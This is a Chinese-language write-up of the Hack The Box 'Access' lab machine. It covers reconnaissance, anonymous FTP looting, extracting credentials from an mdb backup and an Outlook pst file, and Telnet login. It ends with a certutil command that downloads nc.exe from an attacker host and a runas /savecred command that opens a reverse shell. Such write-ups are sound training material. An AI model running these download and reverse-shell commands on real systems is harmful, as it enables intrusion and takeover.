hack the box-Access Writeup

1、摘要

Acces是搭建在Windows平臺上的一道CTF題目，探究服務器上的滲透測試

2、信息蒐集

題目就只給出一個IP：10.10.10.98

首先經過Nmap進行端口方面的探測

nmap -sV -sT -sC 10.10.10.98

 服務器一共開放了21/Ftp、23/Telnet、80/Http端口，優先方問Http去看看網站

3、Web端測試

訪問Web端口時，就出現了一個機房的照片，可是並無從中看出什麼端倪。

隨後利用gobuster對網站目錄進行了枚舉

只跑到/aspnet_client頁面

而/aspnet_client是403禁止的

4、另尋他路

以前Nmap掃描的時候有在21端口後面出現一句話

ftp-anon: Anonymous FTP login allowed (FTP code 230)

 告訴咱們FTP能夠匿名登錄

進入Backups發現有個mdb文件，隨後下載它

 

不得不說太大了

 emmmm，不知道什麼緣由，隨後請教大佬。說是要以二進制方式去下載文件，能夠防止數據的丟失

若是是linux系統，利用mdbtools工具打開

mdb-tables backups.mdb

 

其中有個auth_user表名值得關注

mdb-export backup.mdb auth_user

 

其中engineer關鍵詞很熟悉，正好是FTP上的另外一個目錄的

去ftp上打開另外一個目錄，發現一個ZIP文件，並下載

發現打開提取文件須要密碼

這裏遇到個毛病，估計是解壓縮的問題，密碼一直錯誤，最後換到Kali下竟然就能夠

pst是Microsoft Outlook電子郵件文件夾

直接下載一個Outlook查看了郵件

他說4Cc3ssC0ntr0ller就是帳戶security的密碼

隨後想到開放了23端口，便Telnet上去

5、權限提高

由於在CTF裏，提權通常有自帶的漏洞文件，如一個軟件、一個腳本等

因此按照思路，去找相關文件

通常來，Linux下經過find找有suid的文件；windows下通常在用戶目錄下

有Administrator、Public、security三個用戶

經判斷，只有公共目錄三能夠利用的(由於administrator目錄進不去)

進入public桌面發現有一個lnk文件

用type查看內容

runas.exe???!!!其中還跟上了/savecred參數，這說明保存了系統的憑證，能夠經過這個runas反彈一個shell

cmd下能夠經過如下命令下載nc.exe

certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe

再利用runas反彈shell

runas /user:Administrator /savecred "nc.exe -c cmd.exe 10.10.xx.xx 1337"